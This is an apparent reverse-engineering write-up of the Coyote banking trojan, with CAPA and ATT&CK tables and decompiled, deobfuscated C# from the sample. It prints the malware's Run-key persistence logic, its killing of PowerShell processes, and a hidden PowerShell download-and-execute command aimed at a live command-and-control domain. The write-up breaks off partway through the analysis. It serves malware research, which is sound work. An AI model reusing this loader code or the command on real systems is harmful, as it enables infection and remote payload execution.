Coyote Banking Trojan
# Coyote Banking Trojan :#
DIE :#
CAPA :#
┍━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ md5 │ 0e1cddca920547a1721fd6621c8c84cd │
│ sha1 │ 1268f12d671f23416ad5fc968cc54f11a8e1533f │
│ sha256 │ c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc │
│ analysis │ static │
│ os │ any │
│ format │ pe │
│ arch │ i386 │
│ path │ C:/Users/DsM/Desktop/c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc.exe │
┕━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ ATT&CK Tactic │ ATT&CK Technique │
┝━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ DEFENSE EVASION │ Deobfuscate/Decode Files or Information T1140 │
│ │ Modify Registry T1112 │
│ │ Obfuscated Files or Information T1027 │
│ │ Process Injection::Thread Execution Hijacking T1055.003 │
│ │ Reflective Code Loading T1620 │
│ │ Virtualization/Sandbox Evasion::System Checks T1497.001 │
├────────────────────────┼────────────────────────────────────────────────────────────────────────────────────┤
│ DISCOVERY │ Account Discovery T1087 │
│ │ File and Directory Discovery T1083 │
│ │ Process Discovery T1057 │
│ │ Query Registry T1012 │
│ │ System Information Discovery T1082 │
│ │ System Owner/User Discovery T1033 │
├────────────────────────┼────────────────────────────────────────────────────────────────────────────────────┤
│ EXECUTION │ Windows Management Instrumentation T1047 │
┕━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ MBC Objective │ MBC Behavior │
┝━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ ANTI-BEHAVIORAL ANALYSIS │ Virtual Machine Detection [B0009] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ COMMAND AND CONTROL │ C2 Communication::Receive Data [B0030.002] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ COMMUNICATION │ HTTP Communication::Get Response [C0002.017] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ CRYPTOGRAPHY │ Generate Pseudo-random Sequence::Use API [C0021.003] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DATA │ Decode Data::Base64 [C0053.001] │
│ │ Encode Data::Base64 [C0026.001] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DEFENSE EVASION │ Obfuscated Files or Information::Encoding-Standard Algorithm [E1027.m02] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DISCOVERY │ File and Directory Discovery [E1083] │
│ │ System Information Discovery [E1082] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ MEMORY │ Allocate Memory [C0007] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ OPERATING SYSTEM │ Environment Variable::Set Variable [C0034.001] │
│ │ Registry::Delete Registry Value [C0036.007] │
│ │ Registry::Query Registry Key [C0036.005] │
│ │ Registry::Query Registry Value [C0036.006] │
│ │ Registry::Set Registry Key [C0036.001] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ PROCESS │ Create Process [C0017] │
│ │ Create Thread [C0038] │
│ │ Suspend Thread [C0055] │
│ │ Terminate Process [C0018] │
┕━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ Capability │ Namespace │
┝━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ reference anti-VM strings targeting Qemu │ anti-analysis/anti-vm/vm-detection │
│ receive data │ communication │
│ decode data using Base64 in .NET (15 matches) │ data-manipulation/encoding/base64 │
│ encode data using Base64 (3 matches) │ data-manipulation/encoding/base64 │
│ generate random numbers in .NET (2 matches) │ data-manipulation/prng │
│ find data using regex in .NET (2 matches) │ data-manipulation/regex │
│ contains PDB path │ executable/pe/pdb │
│ access .NET resource │ executable/resource │
│ set environment variable │ host-interaction/environment-variable │
│ get common file path │ host-interaction/file-system │
│ check if directory exists │ host-interaction/file-system/exists │
│ manipulate unmanaged memory in .NET │ host-interaction/memory │
│ get hostname (2 matches) │ host-interaction/os/hostname │
│ get OS version in .NET │ host-interaction/os/version │
│ create process on Windows │ host-interaction/process/create │
│ inject thread │ host-interaction/process/inject │
│ find process by PID │ host-interaction/process/list │
│ find process by name (2 matches) │ host-interaction/process/list │
│ terminate process (2 matches) │ host-interaction/process/terminate │
│ terminate process by name in .NET │ host-interaction/process/terminate │
│ query or enumerate registry key (2 matches) │ host-interaction/registry │
│ query or enumerate registry value │ host-interaction/registry │
│ set registry value │ host-interaction/registry/create │
│ delete registry value │ host-interaction/registry/delete │
│ get session user name │ host-interaction/session │
│ suspend thread (5 matches) │ host-interaction/thread/suspend │
│ access WMI data in .NET │ host-interaction/wmi │
│ spawn thread to RWX shellcode │ load-code/shellcode │
│ unmanaged call (5 matches) │ runtime │
│ compiled to the .NET platform │ runtime/dotnet │
┕━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
output in JSON: ![[res.json]]
Visualizer : https://mandiant.github.io/capa/explorer/
dnSpy :#
Trying to understand the main function :#
Looking at the first part :
With CyberChef, after reading the logic, we find that the Base64 decodes to: default_set
So we obtain :
// Decompiled Main body, first pass (original obfuscated names kept). Analyst notes inline.
// UTF-8 round-trip of "default_set" whose result is discarded: effectively a no-op.
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
// Two-second delay before any activity.
Thread.Sleep(2000);
// The same routine is invoked three times back to back. It is the Run-key cleanup
// analysed next; that routine deletes at most one registry value per call (it breaks
// after the first match), so three calls remove up to three entries.
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
// Branch on a check analysed later in the write-up (a directory-existence test).
if (!TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY())
{
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
// First argument is double-Base64 with the junk token "XD2s6HWK5J" stripped between the
// two decodes; the write-up later resolves it to the string "Default".
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
// Waits five seconds, then terminates the process; this branch never reaches the loop below.
Thread.Sleep(5000);
Environment.Exit(0);
}
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
// Keeps the process alive indefinitely; whatever the preceding calls started
// presumably runs on other threads (not visible in this excerpt).
for (;;)
{
Thread.Sleep(500);
}
we have a sleep of 2 seconds
and we have a call to : TVrzDkssV.JwpwwwUxNHBjDMpXYBb5()
corresponding to :
// Body of TVrzDkssV.JwpwwwUxNHBjDMpXYBb5() as decompiled. Every string literal uses the
// sample's obfuscation scheme: Base64-decode, strip a junk token (here "WN0zQYhLrk",
// "gP2corwLet", "fxewjVQnz3"), Base64-decode again.
try
{
// Opens an HKCU subkey writable (second argument true); decoded later in the
// write-up as Software\Microsoft\Windows\CurrentVersion\Run.
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("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")).Replace("WN0zQYhLrk", ""))), true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
// Matches on the value data (decoded later as "powershell") or on the value name
// (decoded later as "jjfz"). Note the left operand becomes null when the value is
// null, so .Contains throws; the outer catch swallows that and the scan stops early.
if (((value != null) ? value.ToString() : null).Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Z1AyY29yd0xldGNHOWdQMmNvcndMZXRnUDJjb3J3TGV0M1pYZ1AyY29yd0xldGdQMmNvcndMZXRKemFnUDJjb3J3TGV0Z1AyY29yd0xldEdWc2dQMmNvcndMZXRnUDJjb3J3TGV0YkE9Z1AyY29yd0xldGdQMmNvcndMZXQ9Z1AyY29yd0xldA==")).Replace("gP2corwLet", "")))) || text.Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Znhld2pWUW56M2FtcGZ4ZXdqVlFuejNmeGV3alZRbnozbWVnZnhld2pWUW56M2Z4ZXdqVlFuejM9PWZ4ZXdqVlFuejM=")).Replace("fxewjVQnz3", "")))))
{
// Deletes only the first matching value, then leaves the loop.
registryKey.DeleteValue(text);
break;
}
}
}
}
}
// Any failure (missing key, access denied, the null case above) is silently swallowed.
catch (Exception)
{
}
The first action opens the registry key (Run):
after edit :
// Same routine with the key path decoded; the author's excerpt omits the trailing
// catch (Exception) block shown in the original decompilation.
try
{
// HKCU Run key opened writable: this is the autostart location the routine cleans up.
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
// Still-obfuscated match strings (value data / value name); decoded in the next step.
if (((value != null) ? value.ToString() : null).Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Z1AyY29yd0xldGNHOWdQMmNvcndMZXRnUDJjb3J3TGV0M1pYZ1AyY29yd0xldGdQMmNvcndMZXRKemFnUDJjb3J3TGV0Z1AyY29yd0xldEdWc2dQMmNvcndMZXRnUDJjb3J3TGV0YkE9Z1AyY29yd0xldGdQMmNvcndMZXQ9Z1AyY29yd0xldA==")).Replace("gP2corwLet", "")))) || text.Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Znhld2pWUW56M2FtcGZ4ZXdqVlFuejNmeGV3alZRbnozbWVnZnhld2pWUW56M2Z4ZXdqVlFuejM9PWZ4ZXdqVlFuejM=")).Replace("fxewjVQnz3", "")))))
{
// One deletion per call, then exit the loop.
registryKey.DeleteValue(text);
break;
}
}
}
}
}
With the same logic I decode the next Base64 strings:
// Fully decoded form of the Run-key cleanup (catch block again omitted by the author).
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
// Removes a Run value whose data contains "powershell" or whose name contains "jjfz".
// The write-up later shows the sample's own persistence is a jjfz-prefixed Run value
// holding a PowerShell command, so this looks like the sample clearing a previous
// installation of itself before re-installing. Note: the substring match is plain
// ordinal Contains, so any Run entry whose data mentions "powershell" is removed too.
if (((value != null) ? value.ToString() : null).Contains("powershell") || text.Contains("jjfz"))
{
registryKey.DeleteValue(text);
break;
}
}
}
}
}
This function searches the Run key for an entry whose value contains "powershell" or whose name contains "jjfz" and deletes the first match (the loop breaks after the deletion).
returning to the main –>
Main (we edit the previous function name):
// Main body after renaming the Run-key cleanup routine.
// Discarded UTF-8 round-trip of "default_set" (no observable effect).
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
Thread.Sleep(2000);
// Called three times because each call deletes at most one matching Run value.
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
// Still-unnamed check; resolved below as a directory-existence test.
if (!TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY())
{
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
// Double-Base64 argument with junk token "XD2s6HWK5J"; decodes to "Default" (see end of write-up).
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
// Short-lived path: sleep five seconds and exit with code 0.
Thread.Sleep(5000);
Environment.Exit(0);
}
// Long-lived path (taken only when the check succeeds).
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
// Main thread parks forever; the process only ends when killed externally.
for (;;)
{
Thread.Sleep(500);
}
Now, we have a call to : TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY()
Go –>
With the same Base64 logic, it checks whether the "Aplicativo Itau" directory exists:
// Body of the routine renamed checkIfDirectoryAplicativo_ItauExist().
// "Aplicativo Itau" is a relative path, so it is resolved against the process's current
// working directory rather than a fixed location — where this points depends on how the
// sample was launched. NOTE(review): the folder name suggests a check for a banking
// application's install folder, but that is inference, not shown by the code.
try
{
if (Directory.Exists("Aplicativo Itau"))
{
return true;
}
}
// Any exception (e.g. path/permission problems) is treated as "not present".
catch (Exception)
{
}
return false;
So now the main look like this :
/// <summary>
/// Entry point of the sample as reconstructed so far. Cleans up prior Run-key persistence,
/// then takes one of two paths depending on whether the "Aplicativo Itau" directory exists:
/// absent → kill powershell, run the ALL_MODULE action, sleep 5 s and exit; present →
/// run the ORANGE_MODULE action plus several still-unanalysed routines and stay resident.
/// </summary>
/// <param name="LagSaOKe0HLKqeARPZ80jSjw">Command-line arguments; never read by this body.</param>
private static void Main(string[] LagSaOKe0HLKqeARPZ80jSjw)
{
// Discarded UTF-8 round-trip; no effect on execution.
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
// Two-second startup delay.
Thread.Sleep(2000);
// Each call removes at most one matching HKCU Run value, hence three calls.
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
// Relative-path directory test (resolved against the current working directory).
if (!TVrzDkssV.checkIfDirectoryAplicativo_ItauExist())
{
// Kills running powershell.exe instances (routine analysed below); called twice.
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
// Double-Base64 argument with junk token "XD2s6HWK5J"; the write-up decodes it to "Default".
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
// Process ends here on this path.
Thread.Sleep(5000);
Environment.Exit(0);
}
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
// Not yet analysed in the write-up.
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
// Resident mode: the main thread sleeps in 500 ms steps forever.
for (;;)
{
Thread.Sleep(500);
}
}
Next, the call at line 11 to TVrzDkssV.EOPAdUd28W9OllK(), taken if the folder does not exist:
we can see that we have the same logic for b64.
Edited after reversing:
// Body of TVrzDkssV.EOPAdUd28W9OllK(): terminates every process named "powershell"
// and waits for each to exit. Main calls this twice on both paths.
try
{
foreach (Process process in Process.GetProcessesByName("powershell"))
{
process.Kill();
process.WaitForExit();
}
}
// Failures (e.g. a process it lacks rights to terminate — presumably, not shown here)
// are swallowed, so the loop may stop before reaching later processes.
catch (Exception)
{
}
If any powershell processes are running, it kills them.
Go back to main :
Go to the call of TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE) :
We have a call to another function that we don't know yet. Let's analyze it (call to: TVrzDkssV.ASliDwS8ZWVsYEAQG(WlTMsU6VlLcAsK6S)).
A lot of obfuscation using Base64. I'm going to reverse it; I deobfuscate the else branch first, because the parameter is equal to TVrzDkssV.ActionWebService.ALL_MODULE if we go back to the call in main.
So this else :
We start to see an url. But now we have a call to TVrzDkssV.WnXmWLyt2Bk4OOSC()
From the format of the concatenation in text2 we can say that this function gets a domain name:
Reverse it :
/// <summary>
/// Returns the C2 host name used by every URL the sample builds. The bytes→string
/// round-trip is a leftover of the obfuscation pattern and has no effect; the method
/// simply yields "afrl.animaliaoqisso.com". Because the URL path segment is randomised
/// per call (see MomTnlEeimxKePAyv4FDhq), this domain is the stable network indicator.
/// </summary>
private static string getDomainName()
{
byte[] b = Encoding.UTF8.GetBytes("afrl.animaliaoqisso.com");
return Encoding.UTF8.GetString(b);
}
Going back to the call, we can edit it:
next we have a call to TVrzDkssV.MomTnlEeimxKePAyv4FDhq(14)
I set the parameter manually to 14.
After a little bit of editing:
/// <summary>
/// Builds a random lowercase ASCII string of length <paramref name="n"/>: the alphabet is
/// repeated n times and one character is picked from each copy using the shared
/// TVrzDkssV.YTbNXcV5hoHYs980IbA random source. Used for URL path segments (13/14/21
/// chars) and for the two-letter PowerShell variable names, so these parts differ on
/// every run and are not suitable as static signatures.
/// </summary>
/// <param name="n">Length of the string; the default of 14 was set by the analyst, the original call sites pass it explicitly.</param>
private static string MomTnlEeimxKePAyv4FDhq(int n = 14)
{
byte[] b = Encoding.UTF8.GetBytes("abcdefghijklmnopqrstuvwxyz");
return new string((from s in Enumerable.Repeat<string>(Encoding.UTF8.GetString(b), n)
select s[TVrzDkssV.YTbNXcV5hoHYs980IbA.Next(s.Length)]).ToArray<char>());
}
we have here a call to TVrzDkssV.YTbNXcV5hoHYs980IbA.Next(s.Length)
It’s a random value :
Go back and continue reversing :
/// <summary>
/// Builds the PowerShell download-and-execute command the sample later writes as its
/// persistence value. The C2 URL (scheme + C2 domain + random path segment) is selected
/// by <paramref name="AllModuleParameters"/>, Base64-encoded, and substituted into a
/// template where the PowerShell decodes it at runtime. Single-quoted string literals in
/// this excerpt are the author's editing artifacts, not valid C#.
/// </summary>
/// <param name="AllModuleParameters">Which module URL to embed; for an unknown value
/// text stays empty and the template still gets an empty placeholder.</param>
/// <returns>The final command line, or string.Empty if anything threw.</returns>
private static string ASliDwS8ZWVsYEAQG(TVrzDkssV.ActionWebService AllModuleParameters)
{
string text3;
try
{
string text = string.Empty;
string text2 = string.Empty;
if (AllModuleParameters != TVrzDkssV.ActionWebService.ORANGE_MODULE)
{
if (AllModuleParameters != TVrzDkssV.ActionWebService.ALL_MODULE)
{
if (AllModuleParameters == TVrzDkssV.ActionWebService.WPP_SENDER)
{
// Still-obfuscated prefix (junk token "9uflRz6m39"); same blob as the ORANGE_MODULE
// branch, presumably the "https://" scheme seen in the decoded ALL_MODULE branch — confirm.
// Path segment: 21 random letters.
text2 = Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("OXVmbFJ6Nm0zOWFIUjl1ZmxSejZtMzk5dWZsUno2bTM5MGNIOXVmbFJ6Nm0zOTl1ZmxSejZtMzlNNkw5dWZsUno2bTM5OXVmbFJ6Nm0zOXk4PTl1ZmxSejZtMzk=")).Replace("9uflRz6m39", ""))) + TVrzDkssV.getDomainName() + "/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(21);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
}
else
{
// ALL_MODULE (the path taken from Main when the directory check fails): 14-char random path.
byte[] b = Encoding.UTF8.GetBytes("https://");
text2 = Encoding.UTF8.GetString(b) + "afrl.animaliaoqisso.com/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(14);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
}
else
{
// ORANGE_MODULE (resident path in Main): 13-char random path.
text2 = Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("OXVmbFJ6Nm0zOWFIUjl1ZmxSejZtMzk5dWZsUno2bTM5MGNIOXVmbFJ6Nm0zOTl1ZmxSejZtMzlNNkw5dWZsUno2bTM5OXVmbFJ6Nm0zOXk4PTl1ZmxSejZtMzk=")).Replace("9uflRz6m39", ""))) + TVrzDkssV.getDomainName() + "/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(13);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
// Command template. Detection-relevant: the fixed parts (hidden window, non-interactive,
// execution-policy bypass, Net.WebClient, DownloadString, IEX) survive every run; the URL
// does not appear in clear text because it is Base64 inside the command and decoded by
// PowerShell itself.
byte[] b1 = Encoding.UTF8.GetBytes('powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'replace\'));IEX $w.DownloadString($u)"');
byte[] b2 = Encoding.UTF8.GetBytes('\\$w');
byte[] b3 = Encoding.UTF8.GetBytes("replace");
// Three substitutions: "$w" and "$u" are renamed to "$" + two random letters (so the
// variable names vary per run and should not be used as signature anchors), then the
// literal "replace" is swapped for the Base64 URL built above.
text3 = Regex.Replace(Regex.Replace(Regex.Replace(Encoding.UTF8.GetString(b1), Encoding.UTF8.GetString(b2), "$" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(2)), Encoding.UTF8.GetString('\\$u'), "$" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(2)), Encoding.UTF8.GetString(b3), text);
}
// Any failure yields an empty command rather than an error to the caller.
catch (Exception)
{
text3 = string.Empty;
}
return text3;
}
So we detect a command :
powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'replace\'));IEX $w.DownloadString($u)"
Go back and we have this now :
So we have a PowerShell command that is added to a registry entry with a random name starting with jjfz, with the PowerShell command as its value. The command downloads and executes a payload.
Going back to main, we have a new part of the malware :
Now we try to understand the next call :
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
Reversing the b64 of the call :
// The double-Base64 argument from Main resolves to the plain string "Default"; the
// bytes→string round-trip is again a no-op, so the call is effectively
// RAjKqBOvBj3rMwI("Default", ALL_MODULE). What the callee does with it is not yet analysed.
byte[] b = Encoding.UTF8.GetBytes("Default");
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(b), TVrzDkssV.ActionWebService.ALL_MODULE);